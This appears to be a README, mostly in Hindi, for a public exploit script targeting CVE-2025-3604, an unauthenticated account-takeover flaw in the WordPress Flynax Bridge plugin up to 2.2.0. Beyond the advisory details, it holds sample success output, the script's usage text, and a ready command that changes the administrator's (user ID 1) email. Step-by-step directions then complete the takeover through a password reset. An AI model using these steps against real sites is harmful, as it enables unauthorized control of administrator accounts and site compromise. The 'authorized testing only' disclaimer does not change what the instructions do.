
Flynax Bridge <= 2.2.0 - बिना प्रमाणीकरण के खाता अधिग्रहण द्वारा विशेषाधिकार वृद्धि
WordPress के लिए Flynax Bridge प्लगइन 2.2.0 तक के सभी संस्करणों में खाता अधिग्रहण के माध्यम से विशेषाधिकार वृद्धि के लिए संवेदनशील है।
यह प्लगइन द्वारा उपयोगकर्ता के खाता विवरण (जैसे ईमेल) को अपडेट करने से पहले उसकी पहचान को ठीक से सत्यापित न करने के कारण होता है। परिणामस्वरूप, अप्रमाणित हमलावर किसी भी उपयोगकर्ता, जिसमें प्रशासक भी शामिल हैं, का ईमेल पता बदल सकते हैं, और फिर खाते को पूरी तरह से अपने कब्जे में लेने के लिए पासवर्ड रीसेट शुरू कर सकते हैं।
CVE: CVE-2025-3604
CVSS: 9.8 (गंभीर)
प्रकाशित: 23 अप्रैल, 2025
अंतिम अद्यतन: 24 अप्रैल, 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
सफल शोषण के बाद, हमलावर WordPress लॉगिन पेज पर जा सकता है और नए सेट किए गए ईमेल का उपयोग करके "अपना पासवर्ड खो गए?" पर क्लिक करके पासवर्ड रीसेट कर सकता है और लक्षित खाते तक पूर्ण पहुंच प्राप्त कर सकता है।
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: WordPress साइट का आधार URL।-id: लक्षित करने के लिए उपयोगकर्ता का आईडी (सामान्यतः एडमिन के लिए 1)।-mail: उस उपयोगकर्ता के लिए सेट किया जाने वाला नया ईमेल।अपने जोखिम पर उपयोग करें। केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए।
द्वारा: Nxploited ( Khaled_alenazi )